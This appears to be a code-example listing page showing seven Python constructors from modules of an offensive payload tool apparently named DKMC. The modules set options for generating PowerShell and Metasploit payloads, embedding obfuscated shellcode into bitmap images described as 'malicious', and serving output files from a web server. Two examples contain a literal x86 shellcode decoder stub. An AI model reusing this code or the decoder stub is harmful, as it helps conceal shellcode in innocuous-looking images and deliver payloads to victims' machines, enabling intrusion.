Exemplo n.º 1
0
 def __init__(self, ui):
     ModuleObject.__init__(self)
     self.ui = ui
     self.vars = {}
     self.vars["url"] = ["", "Url that point to the malicious image"]
     self.description = "Module to generate Powershell payload"
     self.module_name = "powershell"
Exemplo n.º 2
0
 def __init__(self, ui):
     ModuleObject.__init__(self)
     self.ui = ui
     self.vars = {}
     self.vars["payfiletype"] = ["", "Metasploit Payload Filetype"]
     self.vars["ipaddr"] = ["", "Your Ip Address To Use"]
     self.description = " Module for generate metasploit payload + install metasploit (WINDOWS MODULE)"
     self.module_name = "\033[33mroot@dkmcpro:~/winrawhex#\033[33m"
Exemplo n.º 3
0
 def __init__(self, ui):
     ModuleObject.__init__(self)
     self.ui = ui
     self.vars = {}
     self.vars["url"] = ["", "Url that point to the malicious image"]
     self.vars["rand"] = ["true", "Use random variables name"]
     self.description = "Module to generate Powershell payload"
     self.module_name = "root@dkmcpro:~/ps#"
Exemplo n.º 4
0
 def __init__(self, ui):
     ModuleObject.__init__(self)
     self.ui = ui
     self.vars = {}
     self.vars["payfiletype"] = ["", "Metasploit Payload Filetype"]
     self.vars["insmsf"] = ["", "Install Metasploit On Your Linux Computer"]
     self.vars["ipaddr"] = ["", "Your Ip Address To Use"]
     self.vars["addkalirepo"] = [
         "", "Add Kali Linux Repository To Your Linux System!"
     ]
     self.description = " Module for generate metasploit payload + install metasploit"
     self.module_name = "\033[33mroot@dkmcpro:~/rawhex#\033[33m"
Exemplo n.º 5
0
 def __init__(self, ui):
     ModuleObject.__init__(self)
     self.ui = ui
     self.vars = {}
     self.vars["shellcode"] = ["", "Shellcode payload using \\x41\\x41 format"]
     self.vars["shellcode-path"] = ["", "Path to a raw shellcode file"]
     self.vars["source"] = ["sample/default.bmp", "Image source file path"]
     self.vars["output"] = ["output/output-%d.bmp" % time.time(), "Output file path"]
     self.vars["debug"] = ["false", "Show debug output. More verbose"]
     self.description = "Module to generate malicious Bitmap image with embedded obfuscation shellcode"
     self.module_name = "generate"
     self.image = {}
     self.decoder = "\xeb\x44\x58\x68[RAND1]\x31\xc9\x89\xcb\x6a\x04\x5a\x68[RAND2]\xff\x30\x59\x0f\xc9\x43\x31\xd9\x81\xf9[MAGIC]\x68[RAND3]\x75\xea\x0f\xcb\xb9[SIZE/4]\x01\xd0\x31\x18\x68[RAND4]\xe2\xf4\x2d[SIZE]\xff\xe0\xe8\xb7\xff\xff\xff"
Exemplo n.º 6
0
 def __init__(self, ui):
     ModuleObject.__init__(self)
     self.ui = ui
     self.vars = {}
     self.vars["folder"] = [
         os.getcwd() + "/output/", "Base folder used to deliver files"
     ]
     self.vars["port"] = ["80", "Port used to bind the web server"]
     self.vars["https"] = ["false", "Use HTTPS"]
     self.vars["certificate"] = [
         "core/util/cert/default.pem", "Certificate path"
     ]
     self.description = "Module to launch a web server"
     self.module_name = "root@dkmcpro:~/web#"
Exemplo n.º 7
0
 def __init__(self, ui):
     ModuleObject.__init__(self)
     self.ui = ui
     self.vars = {}
     self.vars["shellcode"] = [
         "",
         "see on shellcodes/msfshellcode.txt and see the READMEBEFOREUSINGSHELLCODE.txt"
     ]
     self.vars["source"] = ["sample/haha.bmp", "Image source file path"]
     self.vars["output"] = [
         "output/output-%d.bmp" % time.time(), "Output file path"
     ]
     self.vars["debug"] = ["false", "Show debug output. More verbose"]
     self.description = "Module to generate malicious Bitmap image with embedded obfuscation shellcode"
     self.module_name = "root@dkmcpro:~/gen#"
     self.image = {}
     self.decoder = "\xeb\x44\x58\x68[RAND1]\x31\xc9\x89\xcb\x6a\x04\x5a\x68[RAND2]\xff\x30\x59\x0f\xc9\x43\x31\xd9\x81\xf9[MAGIC]\x68[RAND3]\x75\xea\x0f\xcb\xb9[SIZE/4]\x01\xd0\x31\x18\x68[RAND4]\xe2\xf4\x2d[SIZE]\xff\xe0\xe8\xb7\xff\xff\xff"